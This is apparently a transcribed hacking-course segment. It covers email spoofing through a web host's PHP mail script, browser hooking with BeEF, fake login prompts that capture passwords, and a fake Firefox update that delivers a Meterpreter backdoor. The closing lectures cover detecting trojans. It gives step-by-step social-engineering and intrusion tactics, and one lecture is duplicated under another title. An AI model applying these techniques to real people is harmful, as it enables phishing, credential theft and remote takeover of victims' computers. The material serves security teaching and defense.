11. Email Spoofing – Method 2
In the previous lecture, we saw how to use an SMTP server to spoof emails and make them appear like they’re sent from any other email address we want. I also mentioned in the previous lecture that there is another way of doing this, and that is by using a web host. Web hosting is simply a service that allows us to host files on the internet. Therefore, we can use it to host our own website, we can use it to share files, or we can even use the server resources to send emails, as I’m going to show you in this lecture. So as you can see, learning how to set up and use a web host can be useful in many scenarios, and you can actually use it to do much more than what I’m going to show you here. You can now find a plethora of free web hosting providers by searching Google. Unfortunately, none of them allow you to send emails. That’s not really a big problem because even paid web hosting plans are very, very cheap. You can look online for the cheapest, and you can use any provider you want because the steps that I’m going to show you will work with any provider. But right here, I have a web hosting provider called DreamHost. They are pretty cheap, and they work well.
So if we click on “Get Started” in here, you’ll see the cheapest plan is $295 per month. So we’re going to click on sign up, and I’m going to set this to monthly, and you’ll notice the price will actually increase slightly. So now it’s $5 per month instead of $295 if you paid for a year, but that’s fine. And I’m going to say, “Choose a domain later.” You’ll really only need to use a domain if you’re hosting your own website. The domain is what you see here on top when it says, for example, Dreamhost.com or Zsecurity.com. But in our case, we don’t need that. So we’re just going to say, “Choose a domain later,” and we’re going to select our payment method. I’m going to pay with PayPal. Next, you have to enter the billing address. Now you don’t have to put the correct information in here. You can write whatever you want.
So I’m just going to fill this out randomly. Next, we have the account set up. Make sure you put a valid email address in here because they will send you a confirmation. So I’m going to use my own email and put a first name, last name, and phone number. Again, it doesn’t have to be real. We’re going to uncheck this to not receive marketing. We don’t want WordPress installed, so we’re unchecking this. We don’t want protection, so we’re unchecking this, and we don’t want the email service that they provide. So we’re unchecking this because we’re actually going to rely on PHP to send the email using the mail function in PHP. So we’re basically unchecking everything. We’re going for the most basic plan they have, and we’re just going to click on submit order. Now, the sign-up might be slightly different if you’re using a different provider, but the steps are very simple and it’s more or less the same. It’s asking us to set a password now, and we’re going to continue to our control panel and complete it.
Now we have a web hosting plan that we can use to host our own websites and files if you want to deliver backdoors and such to your targets. Or you can use it to send fake emails, as I’m going to show you. Now, again, using this dashboard might be slightly different depending on the provider that you have, but you’ll notice that the steps are pretty much the same. You want to first access your management page for the website. So you can see in here that it’s given us this button called “manage my websites.” We can see this is our website right now, but it’s saying it’s unavailable because it’s still being set up.
So we’ll give it; it’s time to set up, and we’ll resume the video once it’s finished. Okay, so now that the website is ready and we can see a preview of it here, we can simply click on it to actually access it. As you can see right now, this is the URL for our website, and as you can see, it’s a simple website that has nothing that tells you that you should go to the admin to add stuff to this website. So back to the management page, we’re going to click on “manage,” and depending on which provider you have, you want to look for the file manager. As you can see, it says manage files in my case. And if we click on the manage icon here, we’re going to get our file manager. From here, you want to navigate to a directory that is called public HTML or a directory that has the name of your website, as we have it in here. So this is actually the name that I signed up with. It’s gibberish, but that’s what I actually said it to be. So we’re just going to click on it.
This is the directory where you should upload your files. So, if you’re hosting a website, upload the website files here, and if you’re sharing files, upload them here as well. Or, in our case, we want to send fake emails. So we’re going to upload the PHP file that we’re going to use to send the emails to this location. Now the file is in the resources of this lecture, so download it. I have it already downloaded in here, and as you can see from the file name, you’re going to have to rename this file to send PHP because I can’t upload PHP files; that’s why I uploaded it in TXT format. So we’re going to go up again, and you’re going to need to find the upload button. In my case, it’s here. I’m going to click on it and select the file that I want to upload, which is in my downloads. and it’s this file right here. I’m going to double-click it, and we have the file right here. Send PHP. So all we need to do now is go to the website, which I’ve opened in a new tab. And then we’ll add a forward slash after the website name and type the file name, send PHP. So, using this is very simple.
Next, we’re going to set the email. This is the email that this email will appear to be coming from. So again, just to change things around, we’re going to set the email this time to Adrianadzetsecurity.org. Now again, when you’re setting the from email, make sure that you set it to an email that actually exists, and make sure that your target actually receives emails from this email and communicates with them. This will ensure that the email will land in the inbox, and it will also increase the chances of your target opening the email and interacting with it. Adrian works with me at the same company. We frequently exchange emails, so this is a really good email to spoof. The next field is the name field. This is similar to the header that we set manually in the previous lecture. So let me go to my inbox to show you where this name shows up. Right here I have an actual email that I got from Adrienne, and this part right here is the name. So whatever you set in here will be displayed in that part. If you don’t set that up, it will automatically be set to the email and it will appear like this one, which is not identical to the real one that I can get from him. So we’re going to assign this to Adrian’s name.
We’re going to set the subject, and let’s just set the subject of this to “test,” and we’re just going to set the body to “this is another email spoofing test.” Now I don’t really need to send a backdoor into this. The whole point of this lecture is to show you another method of spoofing emails. So now that we’re done with everything, I’m going to click on submit to send the email, and as you can see, it’s saying email sent. That means the email was sent and received. So let’s go to the inbox, let’s see if it looks identical to the real one, and let’s see if it actually gets delivered into our inbox. So right here I have my inbox, and as you can see here, the bottom one is an actual email that I got from Adrian. This is a real email from Adrian. The name can be seen here, which is similar to the name here. If I hover over the real email, as you can see, I’ll get a card that shows his name, his email, and his phone number.
And if I hover over the spoof one again, I get the exact same card because it’s pulling this from my contacts. So it’s automatically populating this if I go to the real email. Right here. Again, you can see this is a real email from him. You see the name, you see the profile, and you see that it’s from Adrian Budd. Let’s go back to the spoof one. You have the picture, you have the name, and if you look in here, you have the correct email. [email protected] The only part that might look a little bit suspicious is the fact that it’s saying this via this, but a lot of people are not going to pay attention to this. And this is only displayed in Gmail. So we tested it live, and this doesn’t even show up on it.
And even with Gmail, we have the correct profile picture, the correct name, the correct email address if you look in here, and even the correct phone number. So this is just another method to show you how to spoof emails in case the previous method didn’t work or if you just didn’t like it. You can try this one again. Like I said, you can use any web hosting provider. You do not have to use the one that I used. You can try the free ones or the paid ones, and like I said, you will get better results with the paid ones. The steps are pretty much the same. The only difference might be the sign-up process and the process of uploading the file to the website. But the idea is the same. You sign up with a web hosting provider, you upload this PHP file, you browse the file from your web browser, and you use it to send the email.
12. BeEF Overview & Basic Hook Method
In this lecture, I’d like to introduce you to a really cool framework called Beef. “Beef” is short for the browser exploitation framework. It allows us to run a number of attacks on hooked browsers that would allow us to further exploit the target system to steal passwords or even gain full access to or full control over the system. So right here, I’m at my Kali machine, and we can go ahead and start beef. And to do that, I’m going to click on all my applications. I’m going to type “beef” and I’m going to click on the first icon in here, “beefstart.” You can use the Beefstop to stop it, but right now we just want to start the framework. So we’re going to click on “start now,” because this is the first time we run the framework, and it’s asking us to set a password for the default user.
So go ahead and pick any password you want. And note that when you type the password, you will not see the characters on screen. This is a security feature so that people around you will not see your password. So right now I’ve actually typed my password, but you can’t see anything on the screen. I’m just going to hit enter, and then it will automatically start the Beef framework for me, and it will automatically start Firefox and go to the web interface that we can use to access Beef and control the hooked browsers. As you can see, the first thing that it’ll ask us for is a username and password to log in to this web interface. The default user is beef. And the password is the one that we just set in Terminal.
I’m going to hit Enter to login, and as you can see, we have the main user interface of Beef. The main thing you can see here on the left are the online and offline browsers. You can control the browsers that are currently connected to Beef in the online browsers. And in the offline browsers, you’ll see the browsers that you previously were able to control. So, you were previously addicted to beef, browsers. Now, in order to hook a browser to Beef and be able to control it and run commands on it, you have to get that browser to execute a specific JavaScript code. So if we go back to the terminal window here that started Beef for us and just scroll up, you’ll see that it’s given us the JavaScript code that we need to use to hook browsers to Beef.
As soon as this piece of code gets executed on a web browser, you will see that web browser here in the online browsers, and you’ll be able to execute a lot of really cool commands that will allow you to show fake login pages. It’ll allow you to show fake updates and even gain full control over the target system. Now, because Beef uses JavaScript, it’ll work on any web browser that supports JavaScript, regardless of what device this web browser is running on. So it’ll basically work on all modern browsers. So it will work against phones, tablets, smart TVs, and all operating systems used on PCs such as Linux, Windows OSX, and so on. Literally any browser that can run JavaScript will be able to run this code and therefore will be able to hook that browser to Beef and do all of the cool things that you will learn in the next lectures. So right now, it really depends on you and your imagination on how you’re going to get this piece of code to run on a web browser. If you’re able to become the man in the middle, you can do DNS spoofing and redirect requests to a page that contains this hook code, or you can inject this JavaScript in any web page that the target loads using the JavaScript injection methods that we learned. Once you become the man in the middle, you can also exploit an XSS vulnerability and inject this code into a vulnerable webpage. And you will learn how to do that in the website hacking section.
Or you can use social engineering to social engineer a target into loading a web page that contains our hook code. So all you’ll need to do is think of a way to get a target to load a page that contains the JavaScript code. Now, in this lecture, I’m going to show you a very basic hook method that is really good for us to make sure that our system is working as expected. And because we’re going to have an HTML page with the hook code, this page can also be used with methods one and four. Therefore, you can either DNS spoof targets to this page or social engineer them to this page. And once they load this page, the hook code will be executed on their browser, and therefore they will be hooked to Beef, and we’ll be able to run all of the commands that Beef allows us to run. So let’s go back to beef. And like I said, this is the code that we want our target browsers to load or execute. So I’m going to copy it, and I’m going to go and open my file manager, and I want to go to my web root.
So, you can either press CTRL L on your keyboard or click here in the path bar and simply press the forward slash. This will open a path text box where you can type the path that you want to go to. And I want to go to VAR at www.html. Now, as we learned before, this is the location where the files for your web server are stored, and the index.html is the file that gets loaded by default when someone loads your IP in their web browser. So I’m going to right-click the index HTML and I’m going to choose to open it with a text editor, and I’m simply going to remove all of this and paste the hook code in here. There is one thing that I want to modify, and that is the IP in here. I’m going to replace this IP with the IP of my Kali machine. As we learned before, you can get the IP using the ifconfig command. So I’m not going to do it right now. You should already know this by now, so I know my IP is 1020-14-07, and that’s it.
We’re ready to go. So if anybody now loads my IP address, which is 102014-07, I will have a web server working on it that will load the index HTML by default. And when this file is loaded, it will load the Beefhook code, and it’ll hook that browser to Beef, which will allow me to run a number of really cool commands. Now, before loading this page, we need to start our web server. And, as previously stated, we can accomplish this by launching Apache. And now my Apache web server is running, and if I go to my Windows machine in here and simply go to the address of my web server, which is 1020-14-207, Now, as you can see, we’ll get a blank page. That’s fine, because our page contains nothing but the code. You could actually have a proper HTML page and just put the hook code at the end or at the beginning, but this will do for testing for now. And if we go back here and go to the Beef interface, if we look at the online browsers, you’ll see we have the IP address of my target, which is 1020-14 to six.This is the IP address of the Windows machine.
And right now, if I click on it, you’ll see I’ll have a number of tabs in here that will allow us to do various things in the home. In the details, you’ll see we have information about the browser of the target. For example, you can see that it doesn’t have a VLC plugin installed. It supports WebSocket. If you scroll down, you can see the user agent, which is Mozilla Five. It’s running on the Windows NT 64-bit architecture. Again, if you keep going down, you can see the cookies, the host name, the screen size, and a lot of other information that can be useful when it comes to exploiting a target. At the Logs tab in here, you’ll see logs of all the events that happened in the browser. And if you execute commands, you’ll see logs in here for these commands. The commands tab is the one that we’re going to be using the most in the next lectures. This will allow you to run various commands on the target. Like I said, you can run information-gathering commands and run commands to inject other JavaScript codes. You can run commands to steal passwords using fake logins. You can run fake updates and get your target to download the back door and hack their computer. There are a lot of really cool things that you can do, and I will walk you through some of the best ones in the next lectures.
In the Proxy tab, you can configure and use a hooked browser as a proxy. The XSS rays will show you if the hook page contains any XSS vulnerabilities. And the network tab will give you an overview of the current network. So right now you can see we have the target running Windows, and we have his browser, which is hooked up to Beef to us.And then from here we’ll be able to, like I said, launch a number of really cool commands that can be used to do so many things and further exploit the target system. Once done with using Beef, you can click on Logout to log out and then go to your All Applications log for Beef and click on Beefstop to stop the service from running in the background. So that’s it for this lecture. I just wanted to give you a quick overview of beef. And in the next lectures, we’ll see how we can use it to steal credentials, get screenshots, gather information, and even gain full control over hooked browsers.
13. BeEF – Hooking Targets Using Bettercap
In this lecture, I’d like to introduce you to a really cool framework called Beef. “Beef” is short for the browser exploitation framework. It allows us to run a number of attacks on hooked browsers that would allow us to further exploit the target system to steal passwords or even gain full access to or full control over the system. So right here, I’m at my Kali machine, and we can go ahead and start beef. And to do that, I’m going to click on all my applications. I’m going to type “beef” and I’m going to click on the first icon in here, “beefstart.” You can use the Beefstop to stop it, but right now we just want to start the framework. So we’re going to click on “start now,” because this is the first time we run the framework, and it’s asking us to set a password for the default user. So go ahead and pick any password you want. And note that when you type the password, you will not see the characters on screen. This is a security feature so that people around you will not see your password. So right now I’ve actually typed my password, but you can’t see anything on the screen. I’m just going to hit enter, and then it will automatically start the Beef framework for me, and it will automatically start Firefox and go to the web interface that we can use to access Beef and control the hooked browsers. As you can see, the first thing that it’ll ask us for is a username and password to log in to this web interface. The default user is beef. And the password is the one that we just set in Terminal. I’m going to hit Enter to login, and as you can see, we have the main user interface of Beef.
The main thing you can see here on the left are the online and offline browsers. You can control the browsers that are currently connected to Beef in the online browsers. And in the offline browsers, you’ll see the browsers that you previously were able to control. So, you were previously addicted to beef, browsers. Now, in order to hook a browser to Beef and be able to control it and run commands on it, you have to get that browser to execute a specific JavaScript code. So if we go back to the terminal window here that started Beef for us and just scroll up, you’ll see that it’s given us the JavaScript code that we need to use to hook browsers to Beef. As soon as this piece of code gets executed on a web browser, you will see that web browser here in the online browsers, and you’ll be able to execute a lot of really cool commands that will allow you to show fake login pages.
It’ll allow you to show fake updates and even gain full control over the target system. Now, because Beef uses JavaScript, it’ll work on any web browser that supports JavaScript, regardless of what device this web browser is running on. So it’ll basically work on all modern browsers. So it will work against phones, tablets, smart TVs, and all operating systems used on PCs such as Linux, Windows OSX, and so on. Literally any browser that can run JavaScript will be able to run this code and therefore will be able to hook that browser to Beef and do all of the cool things that you will learn in the next lectures. So right now, it really depends on you and your imagination on how you’re going to get this piece of code to run on a web browser. If you’re able to become the man in the middle, you can do DNS spoofing and redirect requests to a page that contains this hook code, or you can inject this JavaScript in any web page that the target loads using the JavaScript injection methods that we learned.
Once you become the man in the middle, you can also exploit an XSS vulnerability and inject this code into a vulnerable webpage. And you will learn how to do that in the website hacking section. Or you can use social engineering to social engineer a target into loading a web page that contains our hook code. So all you’ll need to do is think of a way to get a target to load a page that contains the JavaScript code. Now, in this lecture, I’m going to show you a very basic hook method that is really good for us to make sure that our system is working as expected. And because we’re going to have an HTML page with the hook code, this page can also be used with methods one and four. Therefore, you can either DNS spoof targets to this page or social engineer them to this page. And once they load this page, the hook code will be executed on their browser, and therefore they will be hooked to Beef, and we’ll be able to run all of the commands that Beef allows us to run. So let’s go back to beef. And like I said, this is the code that we want our target browsers to load or execute. So I’m going to copy it, and I’m going to go and open my file manager, and I want to go to my web root.
So, you can either press CTRL L on your keyboard or click here in the path bar and simply press the forward slash. This will open a path text box where you can type the path that you want to go to. And I want to go to VAR at www.html. Now, as we learned before, this is the location where the files for your web server are stored, and the index.html is the file that gets loaded by default when someone loads your IP in their web browser. So I’m going to right-click the index HTML and I’m going to choose to open it with a text editor, and I’m simply going to remove all of this and paste the hook code in here. There is one thing that I want to modify, and that is the IP in here. I’m going to replace this IP with the IP of my Kali machine. As we learned before, you can get the IP using the ifconfig command. So I’m not going to do it right now. You should already know this by now, so I know my IP is 1020-14-07, and that’s it. We’re ready to go. So if anybody now loads my IP address, which is 102014-07, I will have a web server working on it that will load the index HTML by default. And when this file is loaded, it will load the Beefhook code, and it’ll hook that browser to Beef, which will allow me to run a number of really cool commands.
Now, before loading this page, we need to start our web server. And, as previously stated, we can accomplish this by launching Apache. And now my Apache web server is running, and if I go to my Windows machine in here and simply go to the address of my web server, which is 1020-14-207, Now, as you can see, we’ll get a blank page. That’s fine, because our page contains nothing but the code. You could actually have a proper HTML page and just put the hook code at the end or at the beginning, but this will do for testing for now. And if we go back here and go to the Beef interface, if we look at the online browsers, you’ll see we have the IP address of my target, which is 1020-14 to six.This is the IP address of the Windows machine. And right now, if I click on it, you’ll see I’ll have a number of tabs in here that will allow us to do various things in the home. In the details, you’ll see we have information about the browser of the target. For example, you can see that it doesn’t have a VLC plugin installed. It supports WebSocket. If you scroll down, you can see the user agent, which is Mozilla Five. It’s running on the Windows NT 64-bit architecture. Again, if you keep going down, you can see the cookies, the host name, the screen size, and a lot of other information that can be useful when it comes to exploiting a target.
At the Logs tab in here, you’ll see logs of all the events that happened in the browser. And if you execute commands, you’ll see logs in here for these commands. The commands tab is the one that we’re going to be using the most in the next lectures. This will allow you to run various commands on the target. Like I said, you can run information-gathering commands and run commands to inject other JavaScript codes. You can run commands to steal passwords using fake logins. You can run fake updates and get your target to download the back door and hack their computer. There are a lot of really cool things that you can do, and I will walk you through some of the best ones in the next lectures. In the Proxy tab, you can configure and use a hooked browser as a proxy.
The XSS rays will show you if the hook page contains any XSS vulnerabilities. And the network tab will give you an overview of the current network. So right now you can see we have the target running Windows, and we have his browser, which is hooked up to Beef to us.And then from here we’ll be able to, like I said, launch a number of really cool commands that can be used to do so many things and further exploit the target system. Once done with using Beef, you can click on Logout to log out and then go to your All Applications log for Beef and click on Beefstop to stop the service from running in the background. So that’s it for this lecture. I just wanted to give you a quick overview of beef. And in the next lectures, we’ll see how we can use it to steal credentials, get screenshots, gather information, and even gain full control over hooked browsers.
14. BeEF – Running Basic Commands On Target
So now that we have our browser or target hooked, we can go to the commands and start executing commands on that target. You can use the search to filter. You’re looking for a certain command if you know what you’re looking for. Or you can use the categories to look for commands suitable for what you want to do on the target computer. Some of these commands are information gathering commands, and some of them are social engineering commands. Some of them will even give you full control over the target computer. There are a lot of commands, so I won’t be able to go over all of them. But I’ll be showing you some of the most important commands and examples of simple ones as well. So you know how to experiment and run the other commands.
So we’re starting, and if you go in the browser, you’ll see commands related to stuff that you can do inside the browser. So you can see things that will allow you to, for example, get a screenshot. You’ll be able to gain access and turn on the webcam to see if it works, and then open the webcam on the target. You can gather information. If you go here on the exploits page, you’ll see a number of exploits that you can run. Again, depending on what’s running on the target computer, you can run them. All you have to do is select the module you want to run and press the Execute button. Sometimes some modules need to send some options to be set up, and we’ll have examples of that as well. in social engineering. Again, there is some really cool stuff that you can do. You can show fake updates, fake notification bars, and stuff like that. So let’s have an example of a very simple command. So again, we’re going to do just an alert to show an alert box. So I’m just using the search to filter, and you can see that this will just create an alert dialogue with the word “beef” in it. You can modify this and type in anything you want.
For example, I’m going to type in “Test,” and then when you hit “Execute,” go on to “Target,” and you’ll see that the target got a message saying “Test.” So this has been injected into the target browser. Another cool thing that you can do is use raw JavaScript, and this will allow you to execute any JavaScript you want. So, once again, you can search Google for a useful JavaScript code, such as a keylogger or whatever you want to do. Or you can write your own if you know JavaScript. And basically, whatever you write here will be executed on the target. Again, we’re only seeing an alert, and this is going to say raw JavaScript. I’m going to execute, and here we go again. We got a message that said “beef raw JavaScript.” Let’s see if we can get a screenshot of the target computer. And we’re going to use a plugin called Spy Spider, I think. Yeah, spiderye. So again, click on it and hit execute. Give it a second. Then we’re going to click on the command here. It looks like this time things didn’t work properly. Let’s just do it again.
And here we go. As you can see, we’ve got a screenshot of what the target person is looking at. Another really good plugin is a plugin. It’s a redirect plugin. And it will basically allow you to redirect the browser to any web page you want. This could be very useful because you can use it to redirect the target person and tell them that they need to download an update. And instead of giving them an update, give them a backdoor. You can redirect them to a fake login page. For example, on Facebook, you can do whatever you want. So you can set the website that you want the target to be redirected to. And we’re going to redirect them to the Beef Project in this example. And once you hit Execute, as you can see here, they’re redirected to the Beef Project. These are some of the basic modules that you can use. Again, you can experiment with these, go over them, and see what would be useful in your particular situation.
15. BeEF – Stealing Passwords Using A Fake Login Prompt
Okay, now let’s have a look at a social engineering plugin that will allow us to steal usernames and passwords for accounts. So, basically, this works by dimming the screen and informing the user that you have logged out of your session. So please log in to your account again so you can get authenticated. So this will allow us to bypass https HSTs and all of the security that’s used by the target account page.
For example, if you’re trying to get the username and password for Facebook, then you’ll be able to bypass all the security that Facebook uses because what you’re doing is actually just showing a fake Facebook page, so the user will never actually get in contact with Facebook. So let’s just click on this, and you’ll see that you can click from here to select the account that you want to hijack. So let’s say we’re going with Facebook, and you can select what the backlight will be. So we’re just leaving that at gray, and we’re going to execute this. And when we get to our target, you’ll notice that they’ve been logged out of their session. So please log in with your username and password. So I’m going to enter Zed as my username and 123456 as my password and hit enter.
And if we go back here, you’ll see that we got our username as “zade and our password as “123456.So you can use this to hijack a number of accounts. For example, let’s just have another example. If we go with YouTube again, you give it an execute and come back, you see the YouTube logo, and you can try to log in, put your username and password, and that will be captured. So again, this is a really good way of gaining access to accounts because even if the user is not planning on logging into the account you’re trying to steal, you’ll kind of force them to enter their username and password to get logged back in to their account. Then you’ll be able to get the username and password.
16. BeEF – Hacking Windows 10 Using a Fake Update Prompt
Okay, so let’s see how we can gain full control and get a meterpreter session from the target computer. So, once again, we’ll start with commands and then move on to social engineering. There are several methods available in this section for obtaining a reverse shell. Everything now depends on how you want to carry out your social engineering attack. What we’re going to use is a notification bar, a fake notification bar, and we’re choosing Firefox because our target runs on Firefox or is used in Firefox. So what this will do is basically tell the user—it will display a notification bar—that there is a new update or a plugin that you need to install. Once they install the plugin, they’ll actually install a backdoor, and you’ll have full access to their computer. So we’re going to use the same backdoor that we’ve always created and used to accomplish this. Now I actually have it stored in my web server, so I have it stored in VAR, www dot HTML, and I have it called Update exe, but it’s the same backdoor, the same reverse HTTP meterpreter that we used before.
So I’m going to give you the full address here. As a result, it’s saved in 1020, 1420, and 207. That’s my actual IP, and the name of the file is Update Exe.And then the notification. The notification is just saying there is an additional plugin that needs to be installed to display some elements on this page. Now you can change this and just say “critical update” for Firefox. Click here to install. So I’m going to hit execute. And if we go on to Target, you can see that they’re getting a message telling them that there’s a new update for Firefox and to click here to download and install. So the target person will be like, “Oh yeah, I need to install this.” So they download it, and now they basically have a backdoor downloaded on their machine. Once they try to run this backdoor to install the update, they think it’s an update, but they’ll actually run a backdoor, which will give us full access to their computer.
Before I open the back door, I need to listen on the port the same way we did before. So I’m just going to show you the options here to show you.I’m not going to go through all the steps. It’s using Metasploit MultiHand there, the same way we did it in the video of listening for ports. So we’re using Meterpreter to reverse HTTP. I have my IP and the port, so I’m just going to exploit it, and I’m listening for the connections now. Now, let’s run the update that we just downloaded, and you can see that we have full control over the target thanks to an Amitarpeter session. Now, again, this is just an example of one way of gaining full control over the target computer. There are a number of ways that you can do this using phishing, and there are a number of social engineering attacks that you can conduct to gain full access to the target computer. So again, I highly recommend you go over the plugins and experiment with them to see what attacks you can come up with.
17. Detecting Trojans Manually
So the Trojans that we have created so far are very cool. They can bypass antivirus programs. They run two pieces of code. The first one runs in the background and runs our own code, which does what we want it to do. For example, open a port or connect back to us and give us a shell.
And it runs another piece of code that the user expects. So it could display an image, play an MP3, or display a PDF file. This functionality makes it very difficult to detect. So the best thing to do is check the properties of the file and make sure that it is what it’s claiming to be. So we have our GTR picture here, and we can see that it’s a JPEG. So it looks like a picture and has an icon. And if I run it, I’ll get a picture like we’ve seen in previous videos. But first, right-click and select Properties. And when we go to the properties, you’ll see that this is an application, not a picture. The same holds true for PDF and MP3. If it was an MP3, it should say MP3, PDF if it was a PDF, and JPG if it was a JPG. However, in this case, we can see that it is saying and telling us that it is an executable.
Going by the details, you’ll see that it is an application. So it’s not a picture. If it was a picture, it should tell you that it’s a picture. So from here, we’ll know that we’re being fooled by this. Another thing you can do is play with the file name, and you’ll be able to reset it if you just rename the file to anything else. You’ll see that it’s an exe file and not a JPEG. So if I just do it and change it to “test,” you’ll see that the name has been changed to “test.” Now let’s assume this Trojan was combined with an executable. So if you run it, you were expecting to get an exe, and you were expecting an application. So let’s assume that it’s combined with Download Accelerator Plus instead of being combined with a picture, so the task is going to be more difficult because you are expecting an application anyway.
So let’s try to run this. Now, obviously, with the picture and with the PDF. Windows will tell you that you’re trying to run an executable, but if you’re expecting an executable, then you’re going to run it anyway, as is the case with DAP. And this will obviously play the executable that you’re looking for and send a reverse session to Kali. So what I’m going to do is go to a tool called Resource Manager. And if you navigate to the network tab (I’m already there), you’ll be able to see all of your machine’s open ports. And we can see here that we have port 80 connected to an IP address of 1020-14-03. Now, obviously, 80 is not very suspicious. So even if it was on 80, then it could not look suspicious. And also, it’s coming from a process called “browser,” which again is not very suspicious. The suspicious part is the remote address.
So it’s accessing a 1020-14-203 address that we have no idea what it is. If it was a website, then putting this in the browser should take you to that website or to a server of that website. In most cases, if this was a hacker computer, it would not take you to a website or anything else. And then you’ll know that this person is an attacker. To verify this, you can use tools called reverse DNS. Lookup gives you an IP address and should tell you what website or domain that IP address belongs to. So let’s have an example on Facebook. So let’s say in your resource manager you see an IP and you’re suspicious about it. So I’m actually going to get you a proper IP address for Facebook. Assume, for example, that you see a connection on port 80 going to this IP in this IP. So if you copy this and go to Google and search for reverse DNS, I’ll put the IP address in here, the one you see in your resources, and you look it up. If it’s for a proper website, then there is nothing to be concerned about. If it looks suspicious, then you’ll know that it’s going to a suspicious person. Now, if you see something like this and it’s going to Facebook while you’re browsing Facebook, then this is normal. You’re using Facebook. So there’s a connection between you and Facebook.
18. Detecting Trojans Using a Sandbox
Another way to discover malicious files is to use a sandbox. A sandbox is basically a place where your file will be executed and analyzed. They will check if any ports will be opened, if it’s going to modify registry entries, or if it’s going to do any suspicious stuff. So it’s not an antivirus program. The Trojan may be able to bypass antivirus software, as we did. All antivirus programmes detect our Trojan. However, sandbox applications or sandbox environments will run this in a controlled environment to see if it does anything suspicious and provide you with a report that you can Google. Again, sandboxing is online, and an example of this is a website called Hybrid Analysis. Using the website is very simple. All you have to do is just go to the URL, select your file, and upload it.
Now, I’ve already done this, so I’m just going to show you the report because analysing the file and doing the report might take some time. So once you get the report, you’ll see some basic information. You’ll see that there have been malicious indicators found. Now it’s hiding them from you, and you have to use the full version and pay for it to see them. But you don’t really need to see them. If you read the whole report, you’ll be able to know that this file is malicious and that it’s going to do something bad on your computer. First of all, you can see that the files suppress error boxes, so it doesn’t display error boxes. It also modifies the registry, and you can see the registry parameters that it’s modifying. You can see that it’s playing with the Internet settings and the connections. You can also see that it’s using the Windows socket service.
So it’s trying to create connections. You can also see that it’s playing with the address of the process. Scrolling down. You’ll see one of the most important indicators. Now, obviously, there is more information here, right here on the network place.You’ll see that it tries to connect to this IP on port 8080. You can now do a reverse DNS lookup on this IP and see that it is not associated with any website. Also, when you upload the payload to this place, it’s never going to be executed on your computer. It’s going to be executed on their server in a sandbox environment. Now, obviously, the method I demonstrated should always be performed in a virtual box when you’re executing it here on your Windows machine; always perform it in a virtual machine, never on your main machine. Or you can use this method, where you upload it to a sandbox environment and it will be analysed for you. And then you can read the report.